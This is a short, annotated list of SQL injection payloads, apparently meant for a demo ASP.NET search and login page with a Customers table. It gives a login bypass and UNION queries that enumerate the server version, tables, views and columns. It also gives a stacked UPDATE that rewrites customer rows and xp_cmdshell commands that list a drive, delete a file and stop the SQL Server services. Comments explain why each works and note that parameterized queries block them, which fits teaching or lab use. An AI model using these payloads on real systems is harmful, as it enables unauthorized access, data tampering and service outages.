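-- Paste the line below into the user textbox of the login page to bypass the login screen.
-- It works only when the page builds its login query by concatenating the textbox value into
-- the SQL text: the quote ends the string literal, "or 3=3" makes the condition always true,
-- and "--" comments out the rest of the query. With a parameterized query the whole input is
-- bound as a plain value and the bypass fails.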

' or 3=3--

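-- Paste each line below, one at a time, into the search textbox of default.aspx.
-- Every line depends on the search query being assembled by string concatenation.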

--get the SQL Server version string (@@version returns version and build information, not the server name)
m;' union SELECT 0,0, @@version --

--get all user table names (xtype = 'U' selects user tables)
m;' UNION select id, name,0 from sysobjects WHERE xtype = 'U'--


--get all view names (xtype = 'V' selects views)
m;' UNION select id, name,0 from sysobjects WHERE xtype = 'V'--

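--get the column names of the Customers table
--(21575115 is presumably the object id of Customers in the demo database; object ids differ between databases)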
m;' UNION SELECT id, name, length FROM syscolumns WHERE id = '21575115'--

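--update the table and modify data by appending a second statement after the search term.
--The write succeeds only if the database login used by the page has UPDATE permission on Customers;
--a login limited to SELECT for the search page would reject it.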
m;' UPDATE Customers SET companyname='guest' where city = 'elgin'--

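--get the file list of drive d.
--xp_cmdshell runs an operating-system command on the database server. It is disabled by default
--from SQL Server 2005 on, and by default only sysadmin members may execute it, so the xp_cmdshell
--lines below work only when the page connects with such a login and the procedure has been enabled.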
m;' exec master..xp_cmdshell 'dir d:'--

--delete a file on drive d
m;' exec master..xp_cmdshell 'del d:\pleasedelete.txt'--

--stop the SQL Server Agent service of the SQL2K5 instance
m;' exec master..xp_cmdshell 'net stop SQLAgent$SQL2K5'--

--stop the SQL Server service of the SQL2K5 instance
m;' exec master..xp_cmdshell 'net stop MSSQL$SQL2K5'--